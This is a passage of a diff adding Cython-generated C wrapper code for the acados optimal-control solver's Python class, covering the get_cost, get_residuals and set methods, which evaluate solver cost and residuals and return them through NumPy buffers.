of the current solution. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_31get_cost(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_30get_cost, "\n Returns the cost value of the current solution.\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_31get_cost = {"get_cost", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_31get_cost, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_30get_cost}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_31get_cost(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("get_cost (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("get_cost", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "get_cost", 0))) return NULL; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_30get_cost(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_30get_cost(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self) { + double __pyx_v_out; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_cost", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":449 + * """ + * # compute cost internally + * acados_solver_common.ocp_nlp_eval_cost(self.nlp_solver, self.nlp_in, self.nlp_out) # <<<<<<<<<<<<<< + * + * # create output + */ + ocp_nlp_eval_cost(__pyx_v_self->nlp_solver, __pyx_v_self->nlp_in, __pyx_v_self->nlp_out); + + /* "acados_template/acados_ocp_solver_pyx.pyx":455 + * + * # call getter + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, "cost_value", &out) # <<<<<<<<<<<<<< + * + * return out + */ + ocp_nlp_get(__pyx_v_self->nlp_config, __pyx_v_self->nlp_solver, ((char const *)"cost_value"), ((void *)(&__pyx_v_out))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":457 + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, "cost_value", &out) + * + * return out # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_out); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 457, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":444 + * + * + * def get_cost(self): # <<<<<<<<<<<<<< + * """ + * Returns the cost value of the current solution. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.get_cost", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":460 + * + * + * def get_residuals(self, recompute=False): # <<<<<<<<<<<<<< + * """ + * Returns an array of the form [res_stat, res_eq, res_ineq, res_comp]. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_33get_residuals(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_32get_residuals, "\n Returns an array of the form [res_stat, res_eq, res_ineq, res_comp].\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_33get_residuals = {"get_residuals", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_33get_residuals, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_32get_residuals}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_33get_residuals(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_recompute = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("get_residuals (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_recompute,0}; + PyObject* values[1] = {0}; + values[0] = ((PyObject *)Py_False); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_recompute); + if (value) { values[0] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 460, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "get_residuals") < 0)) __PYX_ERR(0, 460, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_recompute = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("get_residuals", 0, 0, 1, __pyx_nargs); __PYX_ERR(0, 460, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.get_residuals", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_32get_residuals(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_recompute); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_32get_residuals(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_recompute) { + PyArrayObject *__pyx_v_out = 0; + double __pyx_v_double_value; + PyObject *__pyx_v_field = NULL; + __Pyx_LocalBuf_ND __pyx_pybuffernd_out; + __Pyx_Buffer __pyx_pybuffer_out; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_t_9; + PyArrayObject *__pyx_t_10 = NULL; + char const *__pyx_t_11; + Py_ssize_t __pyx_t_12; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_residuals", 0); + __pyx_pybuffer_out.pybuffer.buf = NULL; + __pyx_pybuffer_out.refcount = 0; + __pyx_pybuffernd_out.data = NULL; + __pyx_pybuffernd_out.rcbuffer = &__pyx_pybuffer_out; + + /* "acados_template/acados_ocp_solver_pyx.pyx":465 + * """ + * # compute residuals if RTI + * if self.nlp_solver_type == 'SQP_RTI' or recompute: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_eval_residuals(self.nlp_solver, self.nlp_in, self.nlp_out) + * + */ + __pyx_t_2 = (__Pyx_PyUnicode_Equals(__pyx_v_self->nlp_solver_type, __pyx_n_u_SQP_RTI, Py_EQ)); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 465, __pyx_L1_error) + if (!__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_2 = __Pyx_PyObject_IsTrue(__pyx_v_recompute); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 465, __pyx_L1_error) + __pyx_t_1 = __pyx_t_2; + __pyx_L4_bool_binop_done:; + if (__pyx_t_1) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":466 + * # compute residuals if RTI + * if self.nlp_solver_type == 'SQP_RTI' or recompute: + * acados_solver_common.ocp_nlp_eval_residuals(self.nlp_solver, self.nlp_in, self.nlp_out) # <<<<<<<<<<<<<< + * + * # create output array + */ + ocp_nlp_eval_residuals(__pyx_v_self->nlp_solver, __pyx_v_self->nlp_in, __pyx_v_self->nlp_out); + + /* "acados_template/acados_ocp_solver_pyx.pyx":465 + * """ + * # compute residuals if RTI + * if self.nlp_solver_type == 'SQP_RTI' or recompute: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_eval_residuals(self.nlp_solver, self.nlp_in, self.nlp_out) + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":469 + * + * # create output array + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.ascontiguousarray(np.zeros((4,), dtype=np.float64)) # <<<<<<<<<<<<<< + * cdef double double_value + * + */ + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_np); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_ascontiguousarray); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_np); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_zeros); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GetModuleGlobalName(__pyx_t_7, __pyx_n_s_np); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_t_7, __pyx_n_s_float64); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + if (PyDict_SetItem(__pyx_t_4, __pyx_n_s_dtype, __pyx_t_8) < 0) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_t_6, __pyx_tuple__25, __pyx_t_4); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = NULL; + __pyx_t_9 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_9 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_4, __pyx_t_8}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_9, 1+__pyx_t_9); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + if (!(likely(((__pyx_t_3) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_3, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 469, __pyx_L1_error) + __pyx_t_10 = ((PyArrayObject *)__pyx_t_3); + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_out.rcbuffer->pybuffer, (PyObject*)__pyx_t_10, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_STRIDES| PyBUF_WRITABLE, 1, 0, __pyx_stack) == -1)) { + __pyx_v_out = ((PyArrayObject *)Py_None); __Pyx_INCREF(Py_None); __pyx_pybuffernd_out.rcbuffer->pybuffer.buf = NULL; + __PYX_ERR(0, 469, __pyx_L1_error) + } else {__pyx_pybuffernd_out.diminfo[0].strides = __pyx_pybuffernd_out.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_out.diminfo[0].shape = __pyx_pybuffernd_out.rcbuffer->pybuffer.shape[0]; + } + } + __pyx_t_10 = 0; + __pyx_v_out = ((PyArrayObject *)__pyx_t_3); + __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":472 + * cdef double double_value + * + * field = "res_stat".encode('utf-8') # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) + * out[0] = double_value + */ + __Pyx_INCREF(__pyx_n_b_res_stat); + __pyx_v_field = __pyx_n_b_res_stat; + + /* "acados_template/acados_ocp_solver_pyx.pyx":473 + * + * field = "res_stat".encode('utf-8') + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) # <<<<<<<<<<<<<< + * out[0] = double_value + * + */ + __pyx_t_11 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_11) && PyErr_Occurred())) __PYX_ERR(0, 473, __pyx_L1_error) + ocp_nlp_get(__pyx_v_self->nlp_config, __pyx_v_self->nlp_solver, __pyx_t_11, ((void *)(&__pyx_v_double_value))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":474 + * field = "res_stat".encode('utf-8') + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) + * out[0] = double_value # <<<<<<<<<<<<<< + * + * field = "res_eq".encode('utf-8') + */ + __pyx_t_12 = 0; + __pyx_t_9 = -1; + if (__pyx_t_12 < 0) { + __pyx_t_12 += __pyx_pybuffernd_out.diminfo[0].shape; + if (unlikely(__pyx_t_12 < 0)) __pyx_t_9 = 0; + } else if (unlikely(__pyx_t_12 >= __pyx_pybuffernd_out.diminfo[0].shape)) __pyx_t_9 = 0; + if (unlikely(__pyx_t_9 != -1)) { + __Pyx_RaiseBufferIndexError(__pyx_t_9); + __PYX_ERR(0, 474, __pyx_L1_error) + } + *__Pyx_BufPtrStrided1d(__pyx_t_5numpy_float64_t *, __pyx_pybuffernd_out.rcbuffer->pybuffer.buf, __pyx_t_12, __pyx_pybuffernd_out.diminfo[0].strides) = __pyx_v_double_value; + + /* "acados_template/acados_ocp_solver_pyx.pyx":476 + * out[0] = double_value + * + * field = "res_eq".encode('utf-8') # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) + * out[1] = double_value + */ + __Pyx_INCREF(__pyx_n_b_res_eq); + __Pyx_DECREF_SET(__pyx_v_field, __pyx_n_b_res_eq); + + /* "acados_template/acados_ocp_solver_pyx.pyx":477 + * + * field = "res_eq".encode('utf-8') + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) # <<<<<<<<<<<<<< + * out[1] = double_value + * + */ + __pyx_t_11 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_11) && PyErr_Occurred())) __PYX_ERR(0, 477, __pyx_L1_error) + ocp_nlp_get(__pyx_v_self->nlp_config, __pyx_v_self->nlp_solver, __pyx_t_11, ((void *)(&__pyx_v_double_value))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":478 + * field = "res_eq".encode('utf-8') + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) + * out[1] = double_value # <<<<<<<<<<<<<< + * + * field = "res_ineq".encode('utf-8') + */ + __pyx_t_12 = 1; + __pyx_t_9 = -1; + if (__pyx_t_12 < 0) { + __pyx_t_12 += __pyx_pybuffernd_out.diminfo[0].shape; + if (unlikely(__pyx_t_12 < 0)) __pyx_t_9 = 0; + } else if (unlikely(__pyx_t_12 >= __pyx_pybuffernd_out.diminfo[0].shape)) __pyx_t_9 = 0; + if (unlikely(__pyx_t_9 != -1)) { + __Pyx_RaiseBufferIndexError(__pyx_t_9); + __PYX_ERR(0, 478, __pyx_L1_error) + } + *__Pyx_BufPtrStrided1d(__pyx_t_5numpy_float64_t *, __pyx_pybuffernd_out.rcbuffer->pybuffer.buf, __pyx_t_12, __pyx_pybuffernd_out.diminfo[0].strides) = __pyx_v_double_value; + + /* "acados_template/acados_ocp_solver_pyx.pyx":480 + * out[1] = double_value + * + * field = "res_ineq".encode('utf-8') # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) + * out[2] = double_value + */ + __Pyx_INCREF(__pyx_n_b_res_ineq); + __Pyx_DECREF_SET(__pyx_v_field, __pyx_n_b_res_ineq); + + /* "acados_template/acados_ocp_solver_pyx.pyx":481 + * + * field = "res_ineq".encode('utf-8') + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) # <<<<<<<<<<<<<< + * out[2] = double_value + * + */ + __pyx_t_11 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_11) && PyErr_Occurred())) __PYX_ERR(0, 481, __pyx_L1_error) + ocp_nlp_get(__pyx_v_self->nlp_config, __pyx_v_self->nlp_solver, __pyx_t_11, ((void *)(&__pyx_v_double_value))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":482 + * field = "res_ineq".encode('utf-8') + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) + * out[2] = double_value # <<<<<<<<<<<<<< + * + * field = "res_comp".encode('utf-8') + */ + __pyx_t_12 = 2; + __pyx_t_9 = -1; + if (__pyx_t_12 < 0) { + __pyx_t_12 += __pyx_pybuffernd_out.diminfo[0].shape; + if (unlikely(__pyx_t_12 < 0)) __pyx_t_9 = 0; + } else if (unlikely(__pyx_t_12 >= __pyx_pybuffernd_out.diminfo[0].shape)) __pyx_t_9 = 0; + if (unlikely(__pyx_t_9 != -1)) { + __Pyx_RaiseBufferIndexError(__pyx_t_9); + __PYX_ERR(0, 482, __pyx_L1_error) + } + *__Pyx_BufPtrStrided1d(__pyx_t_5numpy_float64_t *, __pyx_pybuffernd_out.rcbuffer->pybuffer.buf, __pyx_t_12, __pyx_pybuffernd_out.diminfo[0].strides) = __pyx_v_double_value; + + /* "acados_template/acados_ocp_solver_pyx.pyx":484 + * out[2] = double_value + * + * field = "res_comp".encode('utf-8') # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) + * out[3] = double_value + */ + __Pyx_INCREF(__pyx_n_b_res_comp); + __Pyx_DECREF_SET(__pyx_v_field, __pyx_n_b_res_comp); + + /* "acados_template/acados_ocp_solver_pyx.pyx":485 + * + * field = "res_comp".encode('utf-8') + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) # <<<<<<<<<<<<<< + * out[3] = double_value + * + */ + __pyx_t_11 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_11) && PyErr_Occurred())) __PYX_ERR(0, 485, __pyx_L1_error) + ocp_nlp_get(__pyx_v_self->nlp_config, __pyx_v_self->nlp_solver, __pyx_t_11, ((void *)(&__pyx_v_double_value))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":486 + * field = "res_comp".encode('utf-8') + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) + * out[3] = double_value # <<<<<<<<<<<<<< + * + * return out + */ + __pyx_t_12 = 3; + __pyx_t_9 = -1; + if (__pyx_t_12 < 0) { + __pyx_t_12 += __pyx_pybuffernd_out.diminfo[0].shape; + if (unlikely(__pyx_t_12 < 0)) __pyx_t_9 = 0; + } else if (unlikely(__pyx_t_12 >= __pyx_pybuffernd_out.diminfo[0].shape)) __pyx_t_9 = 0; + if (unlikely(__pyx_t_9 != -1)) { + __Pyx_RaiseBufferIndexError(__pyx_t_9); + __PYX_ERR(0, 486, __pyx_L1_error) + } + *__Pyx_BufPtrStrided1d(__pyx_t_5numpy_float64_t *, __pyx_pybuffernd_out.rcbuffer->pybuffer.buf, __pyx_t_12, __pyx_pybuffernd_out.diminfo[0].strides) = __pyx_v_double_value; + + /* "acados_template/acados_ocp_solver_pyx.pyx":488 + * out[3] = double_value + * + * return out # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_out); + __pyx_r = ((PyObject *)__pyx_v_out); + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":460 + * + * + * def get_residuals(self, recompute=False): # <<<<<<<<<<<<<< + * """ + * Returns an array of the form [res_stat, res_eq, res_ineq, res_comp]. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + { PyObject *__pyx_type, *__pyx_value, *__pyx_tb; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&__pyx_type, &__pyx_value, &__pyx_tb); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out.rcbuffer->pybuffer); + __Pyx_ErrRestore(__pyx_type, __pyx_value, __pyx_tb);} + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.get_residuals", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + goto __pyx_L2; + __pyx_L0:; + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out.rcbuffer->pybuffer); + __pyx_L2:; + __Pyx_XDECREF((PyObject *)__pyx_v_out); + __Pyx_XDECREF(__pyx_v_field); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":492 + * + * # Note: this function should not be used anymore, better use cost_set, constraints_set + * def set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * + * """ + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_35set(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_34set, "\n Set numerical data inside the solver.\n\n :param stage: integer corresponding to shooting node\n :param field: string in ['x', 'u', 'pi', 'lam', 't', 'p']\n\n .. note:: regarding lam, t: \n\n the inequalities are internally organized in the following order: \n\n [ lbu lbx lg lh lphi ubu ubx ug uh uphi; \n\n lsbu lsbx lsg lsh lsphi usbu usbx usg ush usphi]\n\n .. note:: pi: multipliers for dynamics equality constraints \n\n lam: multipliers for inequalities \n\n t: slack variables corresponding to evaluation of all inequalities (at the solution) \n\n sl: slack variables of soft lower inequality constraints \n\n su: slack variables of soft upper inequality constraints \n\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_35set = {"set", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_35set, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_34set}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_35set(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + int __pyx_v_stage; + PyObject *__pyx_v_field_ = 0; + PyObject *__pyx_v_value_ = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("set (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_stage,&__pyx_n_s_field_2,&__pyx_n_s_value,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_stage)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 492, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, 